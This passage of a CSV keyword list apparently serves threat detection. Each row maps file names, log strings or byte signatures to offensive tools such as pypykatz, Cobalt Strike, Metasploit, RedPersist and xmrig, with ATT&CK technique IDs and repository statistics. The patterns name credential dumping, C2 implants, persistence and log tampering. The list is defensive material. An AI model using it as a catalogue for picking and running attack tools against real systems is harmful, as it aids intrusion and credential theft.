Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*\wl_log.txt*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\wl-lic.exe*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\wl-lic.pdb*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\wmi_1.dll*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*\wmi_2.dll*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*\WritebleRegistryKeys.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\ws-dirs.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\ws-files.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\WSPCoerce.cs*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*\x44\x8b\x01\x44\x39\x42*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\x64\Release\indirect.exe *,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\x8b\x31\x39\x72\x10\x75*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\xmrig-*-gcc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\xmrig.exe*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\xmrig-6.20.0*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\xmrig-master*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\XOR_b64_encrypted\*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\xorencrypt.py*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\ysoserial\*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*] Eventviewer Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Extension Hijacking Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Found non-ASCII service: *,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*] Powershell Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Screensaver Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Startup Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] UserInitMprLogonScript Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.xlsx*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_backdoor.exe*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*_backdoor.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_BloodHound.zip*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*_cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*_dcsync.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*_dns_hijack/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*_dns_hijack/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*_dump_users.lst*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*_enum_vault_creds*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*_EvilClippy.*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,0,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*_execve_binsh.s*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_find_sharpgen_dll*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*_generate_bind_payloads_password*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*_generate_scramblesuit_passwd*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*_GetNetLoggedon.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*_lfi_rce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_lsass.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*_lsassdecrypt.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*_mouse_rce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_msfconsole*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_msfvenom*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_nimplant_*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*_peloader.dll*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*_posh-common*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*_prefix_PEzor_*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*_pycobalt_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 